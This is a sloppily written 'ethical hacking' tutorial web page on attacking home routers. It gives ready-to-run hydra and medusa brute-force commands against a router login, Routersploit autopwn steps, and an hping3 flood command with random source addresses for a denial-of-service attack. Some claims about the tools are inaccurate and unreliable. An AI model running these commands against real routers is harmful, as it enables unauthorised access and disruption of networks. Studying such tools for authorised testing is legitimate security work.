Router and Switches Penetration Testing Tools Routersploit Framework

Router and Switches Penetration Testing Tools Routersploit Framework

Router and Switches Penetration Testing Tools Routersploit Framework:-In  this  cyberpoint9 tutorial we are going to describe about the  concept of Router Penetration Testing in ethical hacking cyber programming. And also we will describe that how can we use ethical hacking for our safety.This is the free ethical hacking tutorials: course for Beginners  And why we  use  ethical hacking  to make  more interactive and  secure for our daily life. Best Online Tutorial for ethical hacking.When ever we want to learn any thing the things become more earlier is somebody/tutorial/study material taught us through Examples. Here we have tried to describe each and every concept of  RouterSploit Framework in Ethickal and Cyber Security   in the light of cyberpoint9.com  best Hindi  Short tutorial using simple and best possible example. These examples are so simple that even a beginner who had never even heard about hacking and Cyber law can easily learn and understand How  the  Ethical Hacking works in our today’s Technical Field. This is  the best  tutorial/Study Material  very beneficial for beginners  as well as Professional. The Complete Ethical Hacking Course:Beginner to Advanced for Every One!

Router Penetration Testing
Routersploit Framework
Denial Of Service Attack

How  Router Penetration Testing Works

free ethical hacking tutorials
free ethical hacking tutorials

————————–

Let us see how can we Use Router Penetration Testing 

There are two type of attacks,

1. Active Attack
We directly attack the services of the router. WiFi Jammer
2. Passive Attack
We use the services of the router.
MiTM, Wireless packet capturing

1. People Do not change the default credentials fo the router’s interface.
–>https://192-168-1-1ip.mobi/default-router-passwords-list/
–>https://www.bestvpn.com/guides/default-router-login-details/
—>https://19216811.wiki/default-router-passwords/

2. People change the default Password
In this scenerio, we will brute force the Password, because the username is almost admin in 90% of the cases
–>hydra
–>medusa
–>xhydra
–>Burp-suite

How  Hydra Works in Ethical Hacking
========

It is a brute forcing tool, CLI based tool, which is used for cracking the authentication either on the service or on the UI.
#hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post
-l —> username
-P –> Password wordlist
192.168.0.1 –> Target IP Address
http-post –> method
ftp://192.168.0.1
ssh://192.168.0.1
http-post —> X

How  Medusa Works in Ethical Hacking
=========

Is considered to be fast then hydra and more precise then hydra. Hydra will give you a list of the words, which among them will be the password, but medusa will give you the exact password.
#medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 192.168.0.1 -M http
-u –> username
-P –> wordlist for password
-h –> target IP Address
-M –> Module
http –> module on which We are performing Brute Force attack

3. When people become more smarter and configure the whole router. There is change in username, there is change in password, there is change in login interface
MAC Address Lookup

#hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post

#medusa -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -h 192.168.0.1 -M http

aFriendInNeedIsAFriendInDeed

How is Routersploit Framework Let Us See

Router and Switches Penetration Testing Tools Routersploit Framework
Router and Switches Penetration Testing Tools Routersploit Framework

======================

Python based Framework, which is used for exploiting the router’s vulnerablity. It gives me the remote session of the router.

Goto google and type “github Routersploit”
From github click on “Cone or Download”
Open the terminal and type
git clone <copied link>
cd routersploit
python rsf.py

______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `–. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ ‘__|`–. \ ‘_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
IoT Exploitation Framework |_|

Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version : 2.2.1

Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10

rsf >
rsf > help
Global commands:
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit
rsf > use
creds exploits payloads scanners
rsf > use scanners/
scanners/2wire_scan scanners/cameras_scan scanners/juniper_scan scanners/routers_scan
scanners/3com_scan scanners/cisco_scan scanners/linksys_scan scanners/shuttle_scan
scanners/asmax_scan scanners/comtrend_scan scanners/misc_scan scanners/technicolor_scan
scanners/asus_scan scanners/dlink_scan scanners/movistar_scan scanners/thomson_scan
scanners/autopwn scanners/fortinet_scan scanners/multi_scan scanners/tplink_scan
scanners/belkin_scan scanners/grandstream_scan scanners/netcore_scan scanners/ubiquiti_scan
scanners/bhu_scan scanners/huawei_scan scanners/netgear_scan scanners/zte_scan
scanners/billion_scan scanners/ipfire_scan scanners/netsys_scan scanners/zyxel_scan
rsf > use scanners/

rsf > use scanners/autopwn
rsf (AutoPwn) > help
Global commands:
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit

Module commands:

run Run the selected module with the given options
back De-select the current module
set <option name> <option value> Set an option for the selected module
setg <option name> <option value> Set an option for all of the modules
unsetg <option name> Unset option that was set globally
show [info|options|devices] Print information, options, or target devices for a module
check Check if a given target is vulnerable to a selected module’s exploit

rsf (AutoPwn) > show options

Target options:

Name Current settings Description
—- —————- ———–
target Target IP address e.g. 192.168.1.1
port 80 Target port

Module options:

Name Current settings Description
—- —————- ———–
threads 8 Number of threads

rsf (AutoPwn) > set target 192.168.0.1
[+] {‘target’: ‘192.168.0.1’}
rsf (AutoPwn) > Run

How is Denial Of Service
=================

HPING3 –> It is a tool for crafting a packet.
Service Printing
TCP/IP Connection Testing
Firewall Testing
Rules Testing
We are using this tool for Deploying a DoS|DDoS Attack

hping3 192.168.228.174 -c 1000000 -d 12000 –flood –rand-source -p 3306


We Rocmeneded that from our user this is only for Knowledge purpose so this is all about Ethical Hacking and Cyber Security

Overview of Network Technology in Ethical Hacking With Examples

Overview of Network Technology in Ethical Hacking With Examples :  Click here 

Follow Us on Social Platforms to get Updated : twiter,  facebookGoogle Plus

 

Leave a Reply

Your email address will not be published. Required fields are marked *